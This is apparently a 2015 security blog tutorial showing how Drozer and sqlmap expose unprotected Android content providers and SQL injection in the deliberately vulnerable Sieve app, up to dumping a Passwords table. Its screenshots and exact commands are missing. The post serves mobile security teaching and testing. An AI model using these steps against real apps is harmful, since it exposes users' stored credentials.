Search This Blog

Monday, 27 July 2015

Android Hacking - Insecure Content Providers

Content Providers

In this post we will look at an example of an insecure content provider in the Sieve application. Content Providers act as an interface for sharing data between applications. Each content provider has a URI that begins with content://

This allows other applications that the know the URI to perform functions on the data such as insert(), query(), update() or delete(). If the content provider permission is not set correctly in the manifest.xml file then it can lead to sensitive data leakage.

Analyzing Insecure Content Providers

As we have seen in the previous post, the Sieve application  has 2 content providers exported.


We can run the app.provider.info -a command on the Sieve application to retrieve further information. The output reveals that there are two content providers DBContentProvider and FileBackupProvider that do not have any permissions assigned for read/write access. However it does reveal that the DBContentProvider/Keys path requires permissions to read/write.


Another method for returning content:// URIs is the finduri module. This can reveal other sensitive paths, in the screenshot below you can see a /Passwords path.


If we try to query it using app.provider.query it returns a password table containing sensitive information including passwords in base64.


This is a good example of how unprotected content providers can reveal sensitive information.


SQL Injection Issues 

Another associated insecurity with content providers is SQL Injection. Content providers are commonly connected to SQLite databases. Therefore if the data has not been suitably sanitized then SQL commands can be injected in order to return information.

There are a number of ways of identifying and exploiting SQLi using Drozer. You can manually inject SQL queries via the app.provider.query or by scanner.provider.injection modules.

It is also possible to use existing tools in conjunction with Drozer modules. In the example below we will use auxiliary.webcontentresolver - this module offers a web service interface to all installed content providers. This then allows us to use sqlmap to exploit.


Drozer and SQLmap

The first thing to do is start the module and select a specified port.


Next navigate to http://localhost:1234 in your browser. You should see a list of content providers on the web page.


If you select the DBContentProvider/Passwords URI, you can then start to manipulate any parameters that are passed through the web interface to the back-end services. The example below shows an SQL error being returned by injecting a quote into the projection parameter.

We can fire up SQLmap and query the URI. The command below takes the URI and tries to manipulate the projection parameter in order to return the tables.




The results show 3 tables have been returned from the SQLite_masterdb.


Finally we can dump the contents of the Passwords database.


References: https://labs.mwrinfosecurity.com/tools/webcontentresolver/
                    http://sqlmap.org/
                    http://blog.mdsec.co.uk/2015/02/the-mobile-application-hackers-handbook.html

No comments:

Post a Comment